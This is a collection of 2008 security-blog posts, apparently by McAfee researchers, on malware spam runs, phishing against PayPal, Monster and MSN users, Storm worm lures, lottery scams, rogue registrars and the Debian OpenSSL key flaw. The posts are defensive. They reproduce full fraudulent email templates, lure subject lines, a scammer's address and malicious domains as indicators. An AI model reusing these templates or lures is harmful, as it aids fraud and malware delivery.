Our friends at Spamhaus have plenty to say about ESTDomains too on many listings, take a look at their nameserver listings for starters SBL53320 SBL53319. Searching ROKSO will reveal a whole lot more. As for Atrivo, it’s a rats nest of issues; A rats nest that would do well to fall off the internet. For more information on the internet-gymnastics I jumped over take a look at this great pdf from hostexploit.com. Keep in mind though that some of the feeder transit networks may be owned or run by the same gang and just exist for redundancy.

The ESTDomains that I’ve investigated first hand have generally fallen into two camps, one where they are registrar directly and one where PublicDomainRegistry is mentioned in the whois, the latter being the “shill” sorry I mean “white labeled Registrar” for the previously mentioned Directi company “resellerclub dot com“. The fact that PrivacyProtect.org is Directi’s whois privacy service (pasted from here) for resellers just makes matters worse.

Don’t get me wrong, Directi have a clue, register a domain directly with a Directi owned registrar and break the AUP and they will act well as any registrar must. I’m specifically talking about the other services they provide to the criminal corners of the web.

It would appear too that the ESTDomains portfolio has had their privacy protection revoked too, this is definitely a step in the right direction. (Breaking news this evening from El Reg and knujon, nice work guys) However, these guys move pretty fast and recently EST moved their privacy needs to their own protectdetails.com domain.

So finally I have to ask those making money by providing the core services Bhavin Turakhia & Divyank Turakhia from Directi, you clearly know the score, so when will you completely stop supporting the illegal acts of EST, DD and other very obvious darkside entities and kick the bad apples out?

Before anyone from a registry or registrar starts the classic “Smith & Wesson” rant think about this, “Smith and Wesson” don’t sell maps or cars, drive you to the forest, apply your camouflage, help with your ICANN accreditation or load your gun for you

Last night we blogged about fake invoice spam carrying malware.  Unsurprisingly those behind the recent attacks continued today with new spam campaigns involving airline ticket invoices.  Messages may appear as follows (other spam campaigns may appear different):

—————————–
From: [name] [airline_name] Airlines
Subject: Your order from {airlines} [number]
   or
Subject: Online order for flight ticket [number]
Body:

Hello,
Thank you for using our new service “Buy airplane ticket Online” on our website.
Your account has been created:

Your login: [characters]
Your password: [characters]

Your credit card has been charged for $[number in the $400 range]
We would like to remind you that whenever you order tickets on our website you get a discount of 10%!
Attached to this message is the purchase Invoice and the flight ticket.
To use your ticket, simply print it on a color printed, and you are set to take off for the journey!

Kind regards,
[name]
[airline]

Attachment: E-ticket_[number].zip (containing an executable, which may have a Word document icon).
—————————–

As with previous campaigns, the executable is a new variant of Spy-Agent.bw.  Once again, Avert Labs reminds readers to practice safe computing, and never to open unexpected email attachments, or follow unexpected URLs; especially from unfamiliar senders.

On July 15, we sent out a Security Advisory including Generic Downloader.ab (MTIS08-131-A).  This covered a Trojan variant that was mass spammed, purporting to be a UPS invoice.  Since then we’ve seen a number of subsequent mass spammings carrying new variants of Spy-Agent.bw, The email message content is similar to the original spam:

———————————-
From: “United Parcel Service”
Subject: [RE] UPS Tracking Number [number]
Body:

Unfortunately we were not able to deliver postal package you sent on July the 1st in time because the recipient’s address is not correct.
Please print out the invoice copy attached and collect the package at our office

Your UPS

Attachment: UPS_INVOICE_[number].zip or invoice_[number].zip
———————————-

Over the past 24 hours we’ve seen other spam runs from “Customs Service” with the attachment “Tax_invoice.zip” as well as “Bill_Tax.zip” attachments from “US Customs Service” and “Rechnung.zip” from “WG: Lastschrift [number]“.  The zip attachments contain .EXE files.  In order for infection to occur users must open the attached ZIP and then choose to run the executables manually.

Product coverage is being updated for new malware variants as necessary and a follow-up security advisory will be sent soon.

These spam runs may continue over the next few days.  Avert Labs reminds readers to practice safe computing, and never to open unexpected email attachments, or follow unexpected URLs; especially from unfamiliar senders.

Recent phishing attempts have been targeting some popular social networking sites and jobs websites, such as facebook.com and monster.com. Due to the amount of personal and sensitive information which is saved there, they are very valuable to phishers. This data could be used to further target or spear phish individual victims by name and even work interests.

We have seen phishing attacks which targeted careerbuilder.com in the past. The latest target is another big recruitment site – monster.com. Just like typical financial phishing emails, the Monster phishing emails have subjects including imperatives like “Monster customer service: important notice” or “Monster customer service: please confirm your data!”

But please do not be fooled! These are not from Monster at all!!

The phishing domain would appear to be hosted on a new UK domain with dns leading to a bot in Turkey. We can see from this phishing site, the phisher is mainly targeting recruiters for their logins and passwords. This would enable them to access hundreds or even thousands of job seekers’ CVs which often contain a gold mine of sensitive data. Other elements of the recruiters account could be useful as well.

The level of personal data on a CV is pretty high, and in the wrong hands outright dangerous. Be vigilant against unsolicited emails!

Just when you were wondering what the Storm worm authors could come up with next after using 4th of July theme as bait for their last spam run, Nuwar has now resorted to a war theme. The authors have cleverly chosen to exploit the escalating political tensions in the Middle East between Iran and the United States over Iran’s threat to attack Israel in response to any military action on its nuclear facilities. Some of the subjects observed in today’s spam are:

The beginning of The World War III
US Army crossed Iran’s borders
US Army invaded Iran
US soldiers occupied Iran
USA attacked Iran
USA declares war on Iran
USA unleashed war on Iran
War between USA & Iran

This is not the first time Nuwar has used a war theme. Incidentally, McAfee christened the Storm worm as “Nuwar” because it used the sensational war theme “Nuclear WAR in USA!” when it first appeared. Since then the authors of Nuwar have used and re-used morbid and shocking themes religiously with every new spam run. These themes sometimes get repeated when that time of the year approaches and this one is no different. War themes have been seen in previous Storm worm campaigns dating back to Nov 2006 & Apr 2007.

Unsuspecting users who follow the link in the spammed email are directed to a Storm bait page hosting a video that purportedly shows the first minutes of the beginning of World War III. Except that clicking the video would download “iran_occupation.exe”. And in case a user wanted to know about the advertised Patriots and Veterans Programs they would end up downloading “Form.exe”.  Both files are detected as W32/Nuwar@MM with McAfee’s latest beta dats.

The Storm bait pages are currently being hosted on the following fast-flux domains.

dailydotnews[.]com
dotdailynews[.]com
morenewsonline[.]com
newsworldnow[.]com
statenewsworld[.]com

The above mentioned domain names have be sanitized in the blog and readers are strongly advised not to attempt to visit them as they host a cocktail of exploits that attempt to infect a visiting machine. This information is being provided for administrators to take pro-active measures and block access to the rouge domains.

On July 1 we released the results of our S.P.A.M (Spammed Persistently All Month) Experiment, in which 50 people from around the world surfed the Web unprotected for 30 days. By taking part in the experiment, participants were given permission to go where most Internet users would not dare, in order to discover how much spam they would attract and what the effects would be. Go everywhere we have told you not to go. Click everything we told you not to click. We then studied the daily blogs and analyzed the spam itself and confirmed that spammers are as active as ever; they are increasingly using psychological tricks to lure Internet users to part with their contact details, identity information and cash. The experiment (the first of its kind) clearly shows that spam continues to evolve, utilizing more local languages and cultural nuances, as well as becoming much more targeted in a bid to avoid detection.

Our brave and bold participants were assembled from 10 countries and by the end of the 30 days they received more than 104,000 spam emails–that’s an average of 2,096 messages each, the equivalent of approximately 70 messages a day.

Many of the spam messages received were phishing emails: emails that pose as a trustworthy source to criminally acquire sensitive information such as usernames, passwords, and bank account details. Other emails carried viruses, and many allowed malware to be silently installed on the computers by persuading participants to surf unsafe web sites. A number of participants noted a decrease in their computer’s processing speed, as well as an increased number of pop-ups.

The Global ‘Spam League’:

1. United States 23233
2. Brazil 15856
3. Italy 15610
4. Mexico 12229
5. United Kingdom 11965
6. Australia 9214
7. The Netherlands 6378
8. Spain 5419
9. France 2597
10. Germany 2331

To read more about the participants experiences, go here
and make sure you download the ‘Global Spam Diaries’ as well.

We often read that scam and phishing attacks are more and more complex. I agree… if we deliberately omit the various phishing kits available from the internet, which are usually not very sophisticated! This weekend I got yet another phishing email scam on my personal email address. This one targets Paypal users and specifically Paypal France since it is written in French. I thought that could be a perfect example to dissect in order to highlight the suspicious parts of its content.

So here is the email body:

First thing to notice: the use of “Cher client Paypal”, which means about the same as “Dear Paypal member” and is a formal way, but also a very non-specific way, to start a mail. Paypal always uses our real name in the beginning of its mails, so any email that appears to be sent from Paypal that starts with such common sentence is suspicious. Moreover we use accents in French, and although it is written in French, there is no accent at all. Worse, there are many grammatical errors. Paypal is a big company, and I find it highly unlikely that they don’t have people who can write French properly! So, just the reading of the email body should be sufficient to encourage us to drop it in the trash bin.

But let’s see the subtler parts now.

The email asks us to click on the button “Activer” in order to re-activate our Paypal account (which has never been deactivated obviously). But as you can see in the following screenshot, the button does not point to the Paypal.fr website but it is linked to  the domain falomensdepeyy.com, although “www.paypal.fr” appears in the URL in an attempt to confuse people. A Very typical tactic!

And last, but not least, let’s look at the email header:

The content of the entry called “X-WEBC-Mail-From-Script” is the proof that this email was sent with a script located at http://www.alkasterdesese.com/mailer1.php, which has nothing to do with Paypal’s website! Although the “From” field contains the correct sender “service@paypal.fr”, we are now sure that this email did not come from Paypal.

At the time of writing, both sites located at alkasterdesese.com and falomensdepeyy.com are shut down.

Additionally, Michael Barrett from PayPal has posted an excellent blog on how to spot scams.

There mustn’t be much going on in the world today as the Nuwar spammers have moved from jumping on real news of natural disasters and current affairs to creating their own fictional events! This high volume spam campaign is using some wacky subjects to lure people into clicking on the links:

Subject: Britney found hanged in locker room
Subject: White House hit by lightning, catches fire
Subject: Oprah found sleeping the streets
Subject: Eiffel Tower damaged by massive earthquake
Subject: Donald Trump missing, feared kidnapped
Subject: Lastest! Obama quits presidential race

This clever social engineering technique plays on peoples inquisitiveness in news of natural disasters and celebrities. The emails also follow the simple format of some text and a link that looks fairly harmless to the uneducated user.

All the links go to a fake pornotube page hosted on legitimate sites that have been hacked. If you click on the video (that’s actually just an image) it tries to download a .exe file. This is detected as BackDoor-DNM and the spam is also currently detected with our Anti-Spam products.

So it goes without saying.. NEVER click on links in an email unless you are sure of its origin, keep your Anti-Virus software up-to-date and if you have a website make sure its properly secured so you’re not hosting stuff like this.

Nuwar families are known for using social engineering to trick users to download themselves. As we mentioned in the blog last month, the topic of the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent variant of Nuwar circulates a fake topic – Beijing earthquake (Not Sichuan earthquake!).

If users click on the fake video image, the file “beijin.exe” (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don’t click it. This page has the iframe link to a malicious javascript.

Upon accessing the above page, the obfuscated javascript is downloaded and run because of the injected iframe. The JavaScript exploits the realplayer vulnerability CVE-2008-1309 and download another variant of Nuwar.
McAfee VSE blocks the script and detect as “JS/Exploit-Shell.gen”.

At the time of writing, the download file was corrupted.

There has been some debate in anti-phishing circles over what a hosting service provider should do when taking down a phishing site. It boils down to one of three basic actions the victims witness.

• Redirect the hits to the brands legitimate site – This in my opinion is a dangerous thing to do on many levels and any brand requesting this action will feature on a follow-up shortly.
• Remove the site and throw the 404 error – Just stopping the site working and having the browser present a standard error is the standard check-box reaction & minimal effort.
• Use the hit as an opportunity for education – This is by far my favored option (even though I’ll play devils advocate when it’s discussed). Once a victim has fallen for a phish email, help them to help themselves in the future with some easy to understand education.

Education has to be appropriate, I’m not suggesting at “click time” is a good time for presenting the user at the Anti Phishing Phil game for instance. (Phil is great though if you’ve never seen it). “In your face” education at click-time is a topic close to the heart of the APWG, they will present their advice on the topic very soon.

So back to the raison d’être of this blog, a 10 gallon hat tip to AT&T for this great vishing takedown. [Listen to the mp3]*. They’ve raised the bar with this one and deserve some hearty kudos. I can’t think of a better way of dealing with a vishing number. The continuous unavailable tone has no place here since it’s easily confused with mis-dialing ^{(Homer mp3)}. They have replaced the disconnected service with a great education statement and sound advice too if the caller thinks that they were a victim.

^{* The quality is much better on the phone, I used our conference bridge to record the example.}

A few days ago I was browsing a forum while I read a message from someone saying that he received a strange link from one of his MSN contact list, which was formed like the following:

http://[MSN_login].flatl1n[removed].info

This domain hosts a webpage asking for MSN logins and passwords and pointing to another webpage asking for ICQ login credentials:

But let’s examine this page in details, especially the “Terms of Use” for example:

“Terms of Use / Privacy Policy:

By filling out this form, you authorize TST Management, Inc to spread the word about this 100% real and upcomming Messenger Community Site.
You will receive your share of the credit in helping us spread the word. This is a harmless Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties.
By using our service/website you hereby fully authorize TST Management, Inc to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us. This is not a “phishing” site that attempts to “trick” you into revealing personal information. Everything we do with your information is disclosed here. If you are under eighteen (18), you MUST obtain permission from a parent or guardian before using our website/service.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).

ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED OR ALLEGEDLY CAUSED BY ANY FAILURE OF PERFORMANCE, ERROR, OMISSION, INTERRUPTION, DEFECT, DELAY IN OPERATION OR TRANSMISSION, COMMUNICATIONS LINE FAILURE, SHALL BE STRICTLY LIMITED TO THE AMOUNT PAID BY OR ON BEHALF OF THE SUBSCRIBER TO THIS SERVICE.

We may temporarily access your MSN account to do a combination
of the following:
1. Send Instant Messages to your friends promoting this site.
2. Introduce new entertaining sites to your friends via Instant Messages.”

Oh well, that reminds me how social engineering is powerful…
The victim received this URL from who is supposed to be one of his MSN contact and it is unlikely he will spend a few minutes reading those lines. So I agree, everything that the attackers do is published inside the Privacy Policy, but I disagree when they say that they don’t “trick” people to get their login credentials: they use social engineering attacks to get users’ passwords, this is dishonest and this is phishing scam!!

Now, here is the funny part of the “Terms of Use”:

“This is a free service. You will not be asked to pay at any time.
You will not be subscribed to anything asking for payment.
This service is made possible by many hours of human effort.

TST Management, Inc reserves the right to change the terms of use / privacy policy at any time without notice. To view the latest version of this privacy policy, simply bookmark this page for future reference.”

So ironic…
And the last part, the one that aroused my curiosity:

“You understand that this agreement shall prevail if there is any conflict between this agreement and the terms of use you accepted when you signed up with MSN. You also understand that by temporarily accessing your msn account, TST Management, Inc is NOT agreeing to MSN’s terms of use and therefore not bound by them.

This agreement shall be construed and governed by the law of the republic of Panama. You expressly consent to the exclusive venue and personal jurisdiction of the courts located in the Republic of panama for any actions arising from or relating to this agreement.

If any provision of this agreement is held to be invalid, illegal or unenforceable for any reason, such invalidity, illegality or unenforceability shall not effect any other provisions of this agreement, and this agreement shall be construed as if such invalid, illegal or unenforceable provision had not been contained herein.

Copyright 2008 TST Management, Inc”

I was wondering if this website was effectively hosted in republic of Panama, but a whois of the domain informed me that the IP address is located in Hong Kong actually:

The Reverse IP field says there are 32 other sites hosted on this server (210.56.53.224).
And we can see also that “TST Management, Inc” (who is the registrant of the domain), owns 412 other domains.
So I decided to do a Google search and I wasn’t surprise to notice that they are apparently used to phishing scams!
“TST Management, Inc” seems to be another name for the “Blue China Group Ltd”, the one that was sued by MySpace last year for mass spamming.

I managed to create a screenshot of the old “Mass Comment Poster” website that belonged to them:

We can see that the Terms of use were very cynical too!!

They also host what they introduce as a MySpace tracker (called “Stalker Tracker”) which is in fact another phishing scam website:

Besides the website displays another “typical” Privacy Policy mentioning:

We may temporarily access your MySpace account to do a combination
of the following:
1. Post bulletins to your friends promoting stalkertrack.com.
2. Post comments to your friends promoting stalkertrack.com.
3. Post a blog about our upcoming tracker for your friends to read.
4. Customize your blog header html with a clickable stalkertrack.com ad image.
5. Send a batch of blog invites on your behalf.
6. Send IM invites with a personalized stalkertrack.com message and/or image advertisement attached – to your friends and potential friends and other members.
7. Introduce new entertaining sites to your friends via comments, bulletins, and messages

And guess how can they do that? Once again, just by using the login credentials entered in the form…

Last but not least, once the login credentials are submitted via the phishing scam MSN/ICQ web pages, a PHP script is called to increment an online counter, and here are the statistics available at the moment:

This counter seems to supervise the activity on all their phishing websites, not only on a couple of them.

We can see that 92 people were reaching one of their phishing scam websites when I was looking at the statistics, they were 35334 unique visitors yesterday, 284746 visitors since the beginning of June, 3616516 visitors last month, and 7031582 visitors since this counter has been created (since February/March 2008 according to the second screenshot).

Be vigilant of such IM messages and websites marked as “copyright” to “Blue China Group, Ltd” or “TST Management, Inc“. Whatever the website purports to be they are certainly requesting your login credentials in an unclear way!!

I was at the APWG CeCOS II conference in Akasaka, Tokyo, Japan the last two days. It was encouraging to see many members from not only academics, security vendors, and anti-phishing groups but also many law enforcement agencies including Interpol, Kyoto Prefacture Police amongst others. There were also several presentators from the Online Gaming community.

Having such a diverse turn-out certainly helps push the greater awareness of a multinude of cyber crime issues. It was very encouraging to see everyone are agreeing on better co-operation in shutting down rogue sites, tracking the bad guys and protecting the users. There was also the video crew from NHK, to bring the CeCOS message across to Japanese TV viewers.

Dr. Uchida-san from The Institute of Information Security and Steve Sheng from Carnegie Mellon University (CMU) also presented a different angle of the issue, from the psychological and educational aspects. Both of which compliment the policy and technology countermeasures.

Shinsuke Honjo and I gave a presentation on Monday to highlight on how malware authors are now going all out to attack on victims from all cultures. They can craft spam, phishing sites or malware to target diverse cultures and groups of Internet users in the Asia Pacific region. It was interesting for us to have our research corroborated with data from other speakers at the event. Terence Park, researcher from KrCERT/CC, in particularly demonstrated how a Korean document viewer was used as a bait, to install a password stealer. This was another classic example of how malware authors, can be using different localized techniques to get their victims.

Overall, the message that seems to be very consistent throughout are – co-operation and education. In tackling a global issue like cyber crime, these are both important factors not only in tracking and prosecuting the criminals, but also in better protecting Internet businesses and users.

It’ll come as no surprise that there are a bunch of domain registrars that are effectively supporting criminal gangs by not acting on reports of domains run for evil deeds and criminal activities. (Or as we say: They don’t wear a glowing white hat!)

I was chatting on email with Garth Bruen from KnujOn the other day and we agreed that it’s been well known for a long time in the industry that certain registrars are “black hat” and he questioned what was being done about it and pointed me at a story they had worked with the Washington Post on the subject of their top ten documented here: http://www.knujon.com/registrars/#the_list.

For a different data source (and one that looks very much like our own ) URIBL’s “hall of shame” has been on line for ages and can be viewed here: http://rss.uribl.com/nic/

I don’t take these things at face value but I’ve been aware of this issue for a couple of years and have even stood up at an APWG conference and shook my finger at registries and registrars in the room after an early presentation on double-flux and made sure they knew only they could help fight it.

Well it looks like Garths article and PR worked, the wheels of power at ICANN have turned and they have told the worst registrars to act!

So my hat tip for the month of May has to go to Garth, Cool.. Nice one… and congratulations!

ICANN state

“But if those registrars, including those publicly cited, do not investigate and correct alleged inaccuracies reported to ICANN, our escalation procedure can ultimately result in ICANN terminating their accreditation and preventing them from registering domain names,”

I suspect however that the “inaccuracies” relate to the accuracy of whois information and if that is the case I suspect that the registrars will simply start their own privacy services.

NB: Privacy and anonymity are different things if your a LEA (Law Enforcement Authority) within your jurisdiction, but to me the humble lower middle-class sysadmin (Hi @SRS) and those outside of their primary jurisdiction they are effectively the same impenetrable barrier. We repute against domains registered with privacy services because statistically speaking (in the filtering metric truck-loads of email world) they are used as anonymity services more than privacy.

Competition time: Just for fun, I’m going to open a book on the first registrar to expire date and put a black McAfee Baseball Cap up for grabs. (We engineers don’t get much SWAG, let alone give it away). Just leave a message with the registrar you think will stop trading (or be disaccredited by ICANN) first and the date you think they will be gone on.

^{Employees of McAfee, KnujOn and ICANN need not apply, I’m the judge and my decision is final!}

Final thoughts: All we need now is a few of the heavily abused cc-TLD’s to do the same and dive into the fight before we see more of these.

In the United Kingdom the term “Postcode Lottery” refers to situations where public services are available to certain postal districts where these districts are carved up by government authorities according to the first 4 characters of the post code (Our equivalent of the American Zip code*). In densely populated areas it is entirely possible for one end of a street to be lucky in a postcode lottery and the other end to be unlucky.

So, postcode Lotteries in the UK are generally bad news. They always get press attention. For instance the national health service (NHS) local trusts will provide a superior premium drug in one area but not in another creating what is known as a Postcode lottery. Prescription charges is another good example.

The remote money fraudsters are taking a very different view!
According to the bottom-feeders a Postcode Lottery is a competition you can win!

Sample below from my yahoo account. Notice the rotten spelling and the possible macro replacement issues, incidentally we call these PBCAK issues internally (Problem Between Chair And Keyboard)

Subject: National Postcode Lottery

National Postcode Lottery

Attention:-

Winner We bring to your notice the winning letter from Nationale Postcode Lottery {United Kingdom Promotion Company} held on the 8th of May, 2008 through Internet ballot System among 10,000 Microsoft users.Subsequently, your email address attached to ticket number 24.2.6.37.15.45 won contract sum of 800,000.00 Pounds ,winning number 100364,ref number XX/0999/171ESP and BATCH: 1211504/MIU.

We request you to pay serious attention to this notification by contacting the claims department with claim information and procedures of claim.

Mr.Jose Bolton
Tel: +44-871-nnn-0525
Fax: +44-700-nnn-0445
Email:divineagent@sify.com

Congratulations once again from our members of staff and thank you for being part of our promotional program.

Yours Sincerely,
Mrs. Stefian Smith
National Postcode Lottery

—————————————————————–
Find the home of your dreams with eircom net property
Sign up for email alerts now [advert removed]

Hardly a political issue, I’m sure you’ll agree. 419 plain and simple. But we’ve seen that email address a lot recently. Time for a good old fashioned LART’ing!

^{*The full 7 character UK postal code is very accurate, it refers to the handful of mail a postie can deliver, approximately 10 houses or thereabouts.}

A highly targeted spear phishing campaign is currently doing the rounds. Executives–including some of our own at McAfee–have received emails purportedly from the U.S. Tax Court. The emails are designed to look like a petition from the Tax Court and are fairly believable, with domains similar to the legitimate ustaxcourt.gov in the “from” address and links. There’s also a legitimate telephone number for the organisation. The executive’s name is listed as the respondent in a case versus the Commissioner of Internal Revenue.

The scammers do their homework when it comes to spear phishing. Instead of pumping out millions of emails to anybody and everybody, spear phishers send out their scams only to people they know will be susceptible to the scam. In this case a top executive–rather than the average employee–is much more likely to be involved in a court case of this nature.

Clicking on the link may result in malicious code such as keyloggers being installed on your system.

The U.S. Tax Court currently has the following notice on its web site:

“The United States Tax Court has received many telephone calls regarding an e-mail which purports to originate from the Court being sent by a member of the Tax Court’s practitioner bar. This message is an example of “Spear Phishing,” which is an e-mail spoofing attempt that targets a specific organization. The Tax Court is not disseminating any e-mail notice to anyone who currently has a case before this Court.”

This week’s news brings another report about arrests of people involved with Crimeware. This story is particularly notable due to the large number of individuals being charged, and because it’s been jointly announced by U.S. and Romanian authorities. Many people involved with gathering information on and prosecuting online criminals have complained about the lack of cooperation from certain countries, but this certainly shows that progress is being made in that arena.

One thing I thought was especially interesting in the report was the description of the process that was allegedly being used by the people involved:

According to the indictment, the Romania-based members of the enterprise obtained thousands of credit and debit card accounts and related personal information by phishing, with more than 1.3 million spam emails sent in one phishing attack. Once directed to a bogus site, victims were then prompted at those sites to enter access device and personal information. The Romanian “suppliers” collected the victims’ information and sent the data to U.S.-based “cashiers” via Internet chat messages. The domestic cashiers used hardware called encoders to record the fraudulently obtained information onto the magnetic strips on the back of credit and debit cards, and similar cards such as hotel keys. Cashiers then directed “runners” to test the fraudulent cards by checking balances or withdrawing small amounts of money at ATMs. The cards that were successfully tested, known as “cashable” cards, were used to withdraw money from ATMs or point-of-sale terminals that the cashiers had determined permitted the highest withdrawal limits. A portion of the proceeds was then wired to the supplier who had provided the access-device information.

This strikes me as a wonderful illustration of the resources that are now being put into the process by criminals. This isn’t a simple operation with some lone kid in his basement; this involves a network of people gathering information and testing, and relatively expensive card-writer hardware.

NDR Spam a.k.a. Backscatter has been around for years but has only recently hit the radar as a major spam issue mainly due to the rise of the botnet and spammers desperation to get messages through to the end user.

What is an NDR?
NDR short for Non Delivery Receipt is an automated email sent by an MTA that informs the sender there has been a problem with the delivery of the message they have sent.

NDRs are also referred to as Delivery Status Notifications (DSN) or simply bounce messages.

So what is NDR Spam?
NDR Spam occurs when spammers fake your email address in the From field when sending their spam. If the intended recipient of the spam does not exist or has no space left in their inbox etc. then you’ll receive a Non Delivery Receipt for an email you never actually sent.

Also contributing to this problem is Challenge/Response spam filtering services, Out Of Office notifications, List auto replies and any other auto-responder type email.

Why has it become a problem?
Spammers are constantly looking for ways to evade anti-spam filters. The recent sharp rise in NDR spam suggests that rather than just having some bad email addresses on their lists that bounce, they have started to target email addresses that bounce in order to get their spam content through to your inbox. They can do this by using totally random email addresses but with a legitimate domain that is destined to bounce or they can compile lists of email addresses that bounce when spammed. It’s even possible the spammers are targeting domains that they know return bounces with the full message attached. Basically the spammer wants to relay his spam via a legitimate mail server to get it in your inbox even if it doesn’t look pretty.

How big is the problem?
NDR spam is currently about 2% of all spam that’s down from over 4% a couple of weeks ago. It’s possible this method hasn’t been effective enough for the spammers. We believe that over 50% of these bounces are coming from the one botnet alone. NDR spam can be broken down into three main categories, an NDR with the full message attached, an NDR with only the spammy headers attached or an NDR with no spam content at all.

Detecting NDR Spam
There are several problems associated with detecting this particular type of spam.

The good news…

Reducing Outbound NDR Spam
Reducing the amount of NDRs sent by your server would also help this situation with the added benefit of reducing the load on your server.

There are two types of bounce synchronous and asynchronous. Synchronous bouncing occurs when the remote mail server rejects the message during the SMTP conversation. This helps reduce load on your server by preventing it having to send an NDR. Unfortunately this can open your server up to dictionary attacks but there are solutions to that issue such as tar pitting. An asynchronous bounce happens when the remote mail server accepts the message and later decides there is a problem with delivery so it returns it by sending an NDR to the return path of the message. I would recommend using synchronous bouncing if it is a feature of your mail server.

We could suggest that all responsible Administrators should leave the Original message in their NDRs making it much easier to identify and block these messages with existing anti-spam technologies but on the flip-side if no NDR messages had the spam content in them then it wouldn’t be worth the spammers while sending them. Each approach has its advantages and disadvantages.

Almost two years ago in 2006 Debian decided to clean up their OpenSSL implementation. They found a few lines of code that were causing Valgrind and Purify to complain about access to uninitialized memory. Without a major investigation into the purpose of the suspect lines of code they were simply removed. All basic tests continued to pass with the lines of code removed and Purify and Valgrind both stopped complaining about the improper memory access. The change was forgotten and everyone believed that the OpenSSL implementation was working just fine.

For the purposes of all the OpenSSL algorithms there was no deficiency. Encryption and decryption and hashes would be calculated correctly. The problem was that the PRNG used for generating keys by the OpenSSL library had been crippled when those critical lines were removed back in 2006. This was not discovered until just this week when Luciano Bello discovered that without those lines the only ‘random’ data used to seed the PRNG was the PID of the OpenSSL process. On many Linux systems the PID is limited to a positive signed 16 bit value. This means there are only 32,767 possibilities. When new keys and certificates were generated by OpenSSL they relied on this number to provide all of their entropy.

The consequence of this bug is that from September 2006 until May 2008 there were only 32,767 possible keys that could be generated by OpenSSL. Several individuals have generated “black lists” of every possible key that this OpenSSL implementation could generate. According to some reports this entire list can be generated in a couple hours. This weakness affects any key generated by OpenSSL including SSH and DNSSEC keys among others.

Many machines will fail to be updated in a quick manner after the discovery of this vulnerability. There are already many botnets which spread by simply brute forcing common username and password combinations over SSH. It will probably not be long until some of these networks are modified to start attempting RSA authentication using the faulty OpenSSL keys. These attacks will not take long to develop and have the potential to compromise large numbers of machines. It is important for administrators to note that even if they replace and upgrade the OpenSSL package they must recreate and replace any keys or certificates generated by the broken OpenSSL kit.

The moral for developers is to always be sure you understand the impact of your code changes. This goes extra for critical libraries like OpenSSL. Minor and seemingly inconsequential changes can leave major problems festering undetected for years. There may also be some changes in the way that Debian developers work with the developers of other related software packages like OpenSSL. Hopefully increased communication between the development teams in the future can prevent this kind of bug from recurring.

In my role as an anti-spam researcher I get to see a lot of spam. Most of the spam I see can be categorized into a fairly small range of spam types. Common examples include pharmacy, stock and watch spam.

Over the last few weeks I have seen a new type of spam. This is spam which is trying to sell a product to save money on gas. Below is an example of a gas spam:

Currently McAfee detect gas spam. Volume is low for this type of spam making up typically 0.2% of all spam.

Given the high price of oil it is not surprising that a spammer has started selling a product which claims to reduce gas bills.

Have you had any odd meetings in your Outlook or Google calendars lately? I’ve been monitoring an interesting spamming technique over the past few weeks where they are sending automatically accepted meeting requests (if you allow that) to your calendar.

The spam is originating from Gmail accounts but the Google and Outlook calendar functions are compatible so the meeting request goes straight into your calendar and you probably won’t notice it until you get a reminder at the spammers chosen time.

All the samples I’ve seen so far are Nigerian Scams which is interesting in itself as the Nigerian scammers have traditionally been less advanced in terms of coming up with new tricks.

This tactic adds a further nuisance factor for the recipients of this spam as it sets your time as “Busy”. Sure, you can turn off automatic acceptance of meeting requests via the Calendar options in Outlook and in Google Calendar but that feature is provided for a reason so why should the spammers stop us using it? This spam campaign has been low volume and targeted as is the nature of the Nigerian Scam email but there’s been alot of talk in the last few months about Gmails captcha being broken so it wouldn’t suprise me if the botnet spammers pick it up pretty soon!

Happy Anniversary!

May 3, 2008, marks the 30th anniversary of spam mail. Yes, it’s been three decades since Gary Thuerk, a Digital Equipment Corporation (DEC) employee at that time, broadcast the very first unsolicited advertising message announcing a new product, the DEC-20, to everyone on the Internet’s predecessor, the Advanced Research Projects Agency Network (ARPANET). Developed by the Defense Advanced Research Projects Agency (DARPA) of the United States Department of Defense, the ARPANET was the world’s first operational packet switching network and paved the way for the information superhighway we now call the world wide web. Take a look at the innocuous message and a write up of the events surrounding this unsolicited commercial email by clicking here: http://www.templetons.com/brad/spamreact.html.

The term “spam”, which refers to SPAM®, a canned meat product sold by the Hormel Foods Corporation, was coined to describe unwanted and unsolicited commercial email. A description of why this term was used is here: http://en.wikipedia.org/wiki/Spam_%28electronic%29#History. The term wasn’t used much in the early days, and it wasn’t until 1994 that spamming started in earnest. Deliberate commercial spamming as a form of advertising is believed to have been started by a law firm, Canter & Siegel. In 1994, the firm sent a message advertising their immigration services to more 6,000 Usenet newsgroups. They developed mass-mailer software to automate the distribution of the email, a practice still used by spammers today.

Over the past 30 years, the face of spam has changed dramatically—from simple text, to obfuscated text, phishing emails, and spammed malware. And it’s even gone beyond that to image spam, spear phishing, attachment spam, and recently even MP3 based spam. At first, spam was sent from single user accounts. Later, spammers pushed their messages through open mail servers. Today, these unwanted emails are typically sent via huge networks of zombie machines, which are designed by malware writers to send large volumes of spam very efficiently. Spamming has also seeped into new venues and morphed into new forms. Spam has evolved from newsgroup and email spamming to Instant Messaging, mobile phone spam, and blog and search result manipulation spam.

Despite Bill Gates’ prediction in 2004 that spam would cease to exist by 2006 (http://news.bbc.co.uk/1/hi/business/3426367.stm), there appears to be no end in sight, even in spite of recent laws, such as the Controlling the Assault of Non-Solicited Pornography And Marketing Act of 2003 (CAN-SPAM) introduced to help curb spam. Why does the law lack legs? It’s mainly because today’s spammers, who are motivated by the prospect of financial gains, largely operate outside of countries with strict anti-spam laws.

In some ways, Bill Gates’ prediction was correct in that spam filtering solutions have been developed over this period of time to detect and filter almost all the spam that is sent, but this is cleaning up the problem, rather than eliminating it entirely. I don’t think anyone would favour an “email tax” to reduce spam, and Challenge/Response systems only contribute to more unwanted mail and slower communications. I personally believe it would take a concerted effort on the part of Internet Service Providers (ISPs) and Internet backbone providers to filter spam at its sources and block rogue “bullet proof” ISPs. Technology currently exists to identify and isolate hijacked spam sending zombie PCs, but ISPs appear reluctant to commit to the infrastructure and customer support needed to implement these systems in a highly competitive and price-sensitive market. A better alternative may be a transition to a newer, more secure, mail protocol that would make it easier to eliminate spam email at the source.

